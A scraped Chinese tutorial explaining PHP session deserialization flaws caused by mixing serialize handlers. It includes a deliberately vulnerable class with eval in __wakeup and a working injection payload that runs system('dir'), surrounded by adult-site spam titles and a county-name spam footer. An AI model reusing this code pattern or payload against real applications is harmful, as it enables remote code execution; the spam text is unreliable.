久久r热视频,国产午夜精品一区二区三区视频,亚洲精品自拍偷拍,欧美日韩精品二区

您的位置:首頁技術(shù)文章
文章詳情頁

PHP session反序列化漏洞深入探究

瀏覽:21日期:2022-06-05 18:00:25
目錄
  • PHP session
  • php三種序列化處理器

PHP session

php session 反序列化漏洞存在的原因:當(dāng)序列化session和讀取反序列化字符時采用的序列化選擇器不一樣時,處理的方法不一樣。

php三種序列化處理器

序列化處理器
php (php默認(rèn)中使用的序列化) 存儲格式為:鍵名 + 豎線 + 經(jīng)過serialize()函數(shù)反序列化處理的值

php_binary 存儲格式:鍵名的長度對應(yīng)的ASCII字符 + 鍵名 + 經(jīng)過serialize()函數(shù)反序列化處理的值

php_serialize 在php版本>5.5.4中可以選擇使用 存儲格式:經(jīng)過serialize()函數(shù)反序列處理的數(shù)組

通過php.ini 可以設(shè)置保存路徑配置 php session 參數(shù)是 session.save_path=“保存路徑”

php 中配置session序列化處理器通過ini_set()方法進(jìn)行選擇 :ini_set(‘session.serialize_handler’, ‘處理器’);

生成session php_serialize序列化處理器

demo2.php<?phpini_set("session.serialize_handler", "php_serialize");session_start();//創(chuàng)建一個session 會話(當(dāng)客戶端第一次訪問時會生成一個隨機(jī)的session文件在指定保存目錄中)$_SESSION["session"] = $_GET["k"];var_dump($_SESSION);

訪問該頁面

查看session 文件保存路徑,生成了一個sess_一串隨機(jī)字符的文件,打開文件查看,從get提交的值以序列化的格式存儲到該文件。

在讀取session時使用不一樣的序列化處理器,使用php_serialize 序列化處理會把 符號 “|“作為一個正常的字符處理。而php序列化處理器會把”|” 當(dāng)成分割符處理。

ctf.php<?phpini_set("session.serialize_handler", "php");session_start();class test{    public $name;    function __wakeup(){eval($this->name);    }}

構(gòu)造成反序列化payload為:k=|O:4:“test”:1:{s:4:“name”;s:17:“system(‘dir’);”;}

訪問demo2.php

查看sess文件內(nèi)容:| 分割符被傳遞了進(jìn)去

再訪問ctf.php,觸發(fā)了__wakeup函數(shù)從而執(zhí)行了eval代碼執(zhí)行命令,由于使用不同的序列化處理器來處理session文件,序列化對特殊符號的處理方法不一樣,從而導(dǎo)致產(chǎn)生了漏洞

到此這篇關(guān)于PHP session反序列化漏洞深入探究的文章就介紹到這了,更多相關(guān)PHP session反序列化內(nèi)容請搜索以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持!

標(biāo)簽: PHP
相關(guān)文章:
主站蜘蛛池模板: 湘乡市| 郑州市| 东乡| 乃东县| 鲁甸县| 黑山县| 凌海市| 丰镇市| 陈巴尔虎旗| 长沙市| 马龙县| 揭西县| 渝北区| 邹平县| 开封市| 伽师县| 宜昌市| 南汇区| 南投县| 新邵县| 闽侯县| 吉木萨尔县| 临沭县| 城固县| 博爱县| 泽库县| 芜湖县| 康定县| 农安县| 兰州市| 抚州市| 阆中市| 政和县| 宁明县| 双城市| 清河县| 黑龙江省| 柳河县| 夏河县| 鲜城| 石柱|